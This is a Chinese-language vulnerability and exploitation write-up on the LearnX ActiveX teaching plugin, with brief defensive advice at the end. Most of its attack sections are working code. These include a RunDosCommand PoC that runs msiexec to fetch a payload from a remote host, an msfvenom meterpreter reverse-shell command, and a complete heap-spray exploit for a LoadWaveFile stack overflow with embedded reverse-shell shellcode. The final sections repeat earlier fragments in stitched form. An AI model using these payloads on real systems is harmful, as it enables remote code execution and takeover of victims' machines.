LearnX控件漏洞挖掘与利用技术分析<\/h1>

前言<\/h2>
本文档详细分析LearnX ActiveX控件的多个安全漏洞，包括命令执行漏洞和栈溢出漏洞的发现与利用过程。LearnX是一款用于大学英语教学的ActiveX插件，分析发现其存在严重安全隐患。<\/p>

分析准备<\/h2>

所需工具<\/h3>

漏洞利用工具<\/strong>：Metasploit Framework<\/li> <\/ol>
安装与配置<\/h3>

默认安装路径：C:\Program Files\Pattek\LearnX<\/code><\/li>
使用COMRaider加载.ocx<\/code>文件分析控件接口<\/li> <\/ol> 漏洞分析<\/h2> 1. RunDosCommand接口命令执行漏洞<\/h3> 漏洞描述<\/h4> RunDosCommand<\/code>接口直接执行传入的系统命令，无任何过滤或限制。<\/p> 验证POC<\/h4> <html<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>'clsid:31F4B58F-5981-488D-94A6-6CA7AC034FAC'<\/span> id<\/span>=<\/span>'target'<\/span>><\/object<\/span>> <\/span><\/span><script<\/span> language<\/span>=<\/span>'javascript'<\/span>> <\/span><\/span> target<\/span>.RunDosCommand<\/span>("calc"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>高级利用<\/h4> 使用MSI格式payload反弹shell：<\/p> <html<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>'clsid:31F4B58F-5981-488D-94A6-6CA7AC034FAC'<\/span> id<\/span>=<\/span>'target'<\/span>><\/object<\/span>> <\/span><\/span><script<\/span> language<\/span>=<\/span>'javascript'<\/span>> <\/span><\/span> target<\/span>.RunDosCommand<\/span>("msiexec \/q \/i http:\/\/192.168.245.128\/r"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>攻击步骤<\/h4> 生成MSI格式payload： msfvenom -f msi -p windows\/meterpreter\/reverse_tcp lhost=<\/span>192.168.245.128 lport=<\/span>4444<\/span> > r <\/span><\/span><\/code><\/pre><\/li> 启动HTTP服务器和Metasploit监听<\/li> 诱使用户访问恶意页面<\/li> <\/ol> 2. LoadWaveFile栈溢出漏洞<\/h3> 漏洞发现<\/h4> 使用COMRaider的fuzz功能发现该漏洞：<\/p> 选择LoadWaveFile<\/code>函数<\/li> 右键选择"fuzz member"<\/li> 生成测试样本并执行fuzz测试<\/li> <\/ol> 崩溃样本<\/h4> <html<\/span>> <\/span><\/span><object<\/span> classid<\/span>=<\/span>'clsid:31F4B58F-5981-488D-94A6-6CA7AC034FAC'<\/span> id<\/span>=<\/span>'target'<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> var<\/span> buf<\/span> =<\/span> ''<\/span>; <\/span><\/span> while<\/span>(buf<\/span>.length<\/span> <<\/span> 1044<\/span>){ <\/span><\/span> buf<\/span> +=<\/span> 'A'<\/span>; <\/span><\/span> } <\/span><\/span> target<\/span>.LoadWaveFile<\/span>(buf<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>漏洞分析<\/h4> 函数原型：int __thiscall LoadWaveFile(char *this, char *a2)<\/code><\/li> 漏洞点： sprintf(&v39, "%s%s", &String, a2)<\/code>处存在栈溢出<\/li> 目标缓冲区大小：0x114<\/li> 无长度检查直接拷贝用户输入<\/li> <\/ul> <\/li> <\/ol> 调试技巧<\/h4> 附加到SysFader<\/code>进程而非IE进程<\/li> 在POC中添加alert<\/code>暂停执行以便附加调试器<\/li> <\/ol> 3. CMPGetWordScore信息泄露漏洞<\/h3> 该函数直接使用用户输入作为索引读取对象内部数据，可能导致敏感信息泄露。<\/p> 漏洞利用<\/h2> LoadWaveFile栈溢出利用<\/h3> 利用条件<\/h4> XP + IE8环境（无DEP保护）<\/li> 使用堆喷射技术<\/li> <\/ul> 完整利用代码<\/h4> <html<\/span>> <\/span><\/span><script<\/span> src<\/span>=<\/span>"heaplib.js"<\/span>><\/script<\/span>> <\/span><\/span><script<\/span> language<\/span>=<\/span>'javascript'<\/span>> <\/span><\/span> var<\/span> heap_obj<\/span> =<\/span> new<\/span> heapLib<\/span>.ie<\/span>(0x10000<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 反弹shell的shellcode (msfvenom生成) <\/span><\/span><\/span><\/span> var<\/span> code<\/span> =<\/span> unescape<\/span>("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u685d%u3233%u0000%u7768%u3273%u545f%u4c68%u2677%u8907%uffe8%ub8d0%u0190%u0000%uc429%u5054%u2968%u6b80%uff00%u6ad5%u6801%ua8c0%u80f5%u0268%u1100%u895c%u50e6%u5050%u4050%u4050%u6850%u0fea%ue0df%ud5ff%u6a97%u5610%u6857%ua599%u6174%ud5ff%uc085%u0a74%u4eff%u7508%ue8ec%u0067%u0000%u006a%u046a%u5756%u0268%uc8d9%uff5f%u83d5%u00f8%u367e%u368b%u406a%u0068%u0010%u5600%u006a%u5868%u53a4%uffe5%u93d5%u6a53%u5600%u5753%u0268%uc8d9%uff5f%u83d5%u00f8%u287d%u6858%u4000%u0000%u006a%u6850%u2f0b%u300f%ud5ff%u6857%u6e75%u614d%ud5ff%u5e5e%u0cff%u0f24%u7085%uffff%ue9ff%uff9b%uffff%uc301%uc629%uc175%ubbc3%ub5f0%u56a2%u006a%uff53%u41d5"<\/span>); <\/span><\/span> <\/span><\/span> var<\/span> nops<\/span> =<\/span> unescape<\/span>("%u9090%u9090"<\/span>); <\/span><\/span> while<\/span>(nops<\/span>.length<\/span> <<\/span> 0x1000<\/span>) nops<\/span> +=<\/span> nops<\/span>; <\/span><\/span> <\/span><\/span> var<\/span> shellcode<\/span> =<\/span> nops<\/span>.substring<\/span>(0<\/span>, 0x800<\/span> -<\/span> code<\/span>.length<\/span>) +<\/span> code<\/span>; <\/span><\/span> while<\/span>(shellcode<\/span>.length<\/span> <<\/span> 0x40000<\/span>) shellcode<\/span> +=<\/span> shellcode<\/span>; <\/span><\/span> <\/span><\/span> var<\/span> block<\/span> =<\/span> shellcode<\/span>.substring<\/span>(2<\/span>, 0x40000<\/span> -<\/span> 0x21<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 堆喷射 <\/span><\/span><\/span><\/span> for<\/span>(var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 500<\/span>; i<\/span>++<\/span>) { <\/span><\/span> heap_obj<\/span>.alloc<\/span>(block<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> alert<\/span>("Spray done"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span> <\/span><\/span><object<\/span> classid<\/span>=<\/span>'clsid:31F4B58F-5981-488D-94A6-6CA7AC034FAC'<\/span> id<\/span>=<\/span>'target'<\/span>><\/object<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> var<\/span> buf<\/span> =<\/span> ''<\/span>; <\/span><\/span> while<\/span>(buf<\/span>.length<\/span> <<\/span> 512<\/span>){ <\/span><\/span> buf<\/span> +=<\/span> unescape<\/span>("%0c%0c%0c%0c"<\/span>); <\/span><\/span> } <\/span><\/span> target<\/span>.LoadWaveFile<\/span>(buf<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>利用要点<\/h4> 使用heaplib.js<\/code>进行堆喷射<\/li> 覆盖返回地址为0x0c0c0c0c<\/code><\/li> 必须通过HTTP服务器访问，不能直接文件方式打开<\/li> <\/ol> 防御建议<\/h2> 输入验证：对所有输入参数进行严格长度和内容检查<\/li> 禁用危险接口：如RunDosCommand<\/code>等<\/li> 启用DEP\/ASLR等缓解措施<\/li> 使用最新版本浏览器（限制ActiveX控件权限）<\/li> 对控件进行代码审计，修复所有不安全函数<\/li> <\/ol> 总结<\/h2> LearnX控件存在多个高危漏洞，攻击者可利用这些漏洞实现远程代码执行。本文详细分析了漏洞发现和利用过程，提供了完整的技术细节和POC代码。这些漏洞虽然涉及的技术较为传统，但在特定环境下仍然具有很高的利用价值。<\/p>

LearnX控件漏洞挖掘与利用技术分析<\/h1>

前言<\/h2> 本文档详细分析LearnX ActiveX控件的多个安全漏洞，包括命令执行漏洞和栈溢出漏洞的发现与利用过程。LearnX是一款用于大学英语教学的ActiveX插件，分析发现其存在严重安全隐患。<\/p>

分析准备<\/h2>

漏洞分析<\/h2>

1. RunDosCommand接口命令执行漏洞<\/h3>

漏洞描述<\/h4> RunDosCommand<\/code>接口直接执行传入的系统命令，无任何过滤或限制。<\/p>

2. LoadWaveFile栈溢出漏洞<\/h3>

3. CMPGetWordScore信息泄露漏洞<\/h3> 该函数直接使用用户输入作为索引读取对象内部数据，可能导致敏感信息泄露。<\/p>

漏洞利用<\/h2>

LoadWaveFile栈溢出利用<\/h3>

前言<\/h2>
本文档详细分析LearnX ActiveX控件的多个安全漏洞，包括命令执行漏洞和栈溢出漏洞的发现与利用过程。LearnX是一款用于大学英语教学的ActiveX插件，分析发现其存在严重安全隐患。<\/p>

漏洞描述<\/h4>
`RunDosCommand<\/code>接口直接执行传入的系统命令，无任何过滤或限制。<\/p>`

3. CMPGetWordScore信息泄露漏洞<\/h3>
该函数直接使用用户输入作为索引读取对象内部数据，可能导致敏感信息泄露。<\/p>